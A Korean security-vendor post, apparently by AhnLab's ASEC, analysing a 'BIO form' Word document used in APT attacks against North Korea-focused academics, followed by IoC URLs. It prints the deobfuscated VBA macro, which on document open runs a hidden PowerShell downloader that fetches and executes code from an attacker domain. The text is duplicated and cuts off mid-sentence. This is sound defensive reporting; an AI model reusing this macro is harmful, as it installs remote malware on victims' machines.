‘BIO 양식’ 제목의 워드문서 유포 중
Contents
‘BIO 양식’ 제목의 워드문서 유포 중
ASEC 분석팀은 지난달부터 꾸준히 워드 문서를 이용한 APT 공격에 대해 게시하였다. 최근 해당 유형의 악성코드가 ‘BIO 양식’ 제목으로 꾸준히 유포되고 있음을 확인하였다. 이전 워드문서의 유포 이력을 보면 해당 파일 역시 대북관련 교수나 연구소장을 타겟으로하여 학술전기(Biography) 양식을 가장하여 유포 중인 것으로 추정된다.
최근 유포가 확인된 파일 역시 워드 파일 내부의 External 링크를 통해 악성 매크로가 포함된 dotm 파일을 실행한다. 아래는 8월 2일에 유포가 확인된 ‘BIO 양식(XX 소장님).docx’ 파일에 포함된 External 링크이다.
[그림1] BIO 양식(XX 소장님).docx’ 에 포함된 External 링크
다운로드 된 BIO.dotm 파일에는 악성 매크로가 포함되어 있다. 매크로 코드는 전과 동일한 방식으로 난독화 되어 있으며, 난독화를 제거하면 아래와 같은 코드를 확인할 수 있다.
Private Sub Document_Open()
Set djfeihfidkasljf = CreateObject("Shell.Application")
dfgdfjiejfjdshaj = "powershell.exe"
dfjsdjailfksf = "C:\windows\temp\Ahnlab.log"
skdjfksjkfjkdsfj = "$fjeils={(New-Object Net.WebClient).Dring('hxxp://zenma.getenjoyment.net/ja/ng.txt')};[string]$aiwdf=$fjeils;$ndask=$aiwdf.insert(28,'ownloadst');$bmcns=iex $ndask;iex $bmcns"
Open Trim(dfjsdjailfksf) For Output As #2
Print #2, skdjfksjkfjkdsfj
Close #2
dfisafkdjaflkjs = "$a='C:\windows\temp\ahnlab.log';$d=[IO.File]::ReadAllText($a);$e=iex $d;iex $e"
djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfisafkdjaflkjs, "", "open", 0
Dim SngSec As Single
SngSec = Timer + 5
Do While Timer < SngSec
DoEvents
Loop
Kill (dfjsdjailfksf)
End Sub
기존에는 특정 URL로 …
ASEC 분석팀은 지난달부터 꾸준히 워드 문서를 이용한 APT 공격에 대해 게시하였다. 최근 해당 유형의 악성코드가 ‘BIO 양식’ 제목으로 꾸준히 유포되고 있음을 확인하였다. 이전 워드문서의 유포 이력을 보면 해당 파일 역시 대북관련 교수나 연구소장을 타겟으로하여 학술전기(Biography) 양식을 가장하여 유포 중인 것으로 추정된다.
최근 유포가 확인된 파일 역시 워드 파일 내부의 External 링크를 통해 악성 매크로가 포함된 dotm 파일을 실행한다. 아래는 8월 2일에 유포가 확인된 ‘BIO 양식(XX 소장님).docx’ 파일에 포함된 External 링크이다.
[그림1] BIO 양식(XX 소장님).docx’ 에 포함된 External 링크
다운로드 된 BIO.dotm 파일에는 악성 매크로가 포함되어 있다. 매크로 코드는 전과 동일한 방식으로 난독화 되어 있으며, 난독화를 제거하면 아래와 같은 코드를 확인할 수 있다.
Private Sub Document_Open()
Set djfeihfidkasljf = CreateObject("Shell.Application")
dfgdfjiejfjdshaj = "powershell.exe"
dfjsdjailfksf = "C:\windows\temp\Ahnlab.log"
skdjfksjkfjkdsfj = "$fjeils={(New-Object Net.WebClient).Dring('hxxp://zenma.getenjoyment.net/ja/ng.txt')};[string]$aiwdf=$fjeils;$ndask=$aiwdf.insert(28,'ownloadst');$bmcns=iex $ndask;iex $bmcns"
Open Trim(dfjsdjailfksf) For Output As #2
Print #2, skdjfksjkfjkdsfj
Close #2
dfisafkdjaflkjs = "$a='C:\windows\temp\ahnlab.log';$d=[IO.File]::ReadAllText($a);$e=iex $d;iex $e"
djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfisafkdjaflkjs, "", "open", 0
Dim SngSec As Single
SngSec = Timer + 5
Do While Timer < SngSec
DoEvents
Loop
Kill (dfjsdjailfksf)
End Sub
기존에는 특정 URL로 …
IoC
http://jupit.getenjoyment.net/Package/2
http://zenma.getenjoyment.net/ja/ng.txt
http://zenma.getenjoyment.net/ja/ng.txt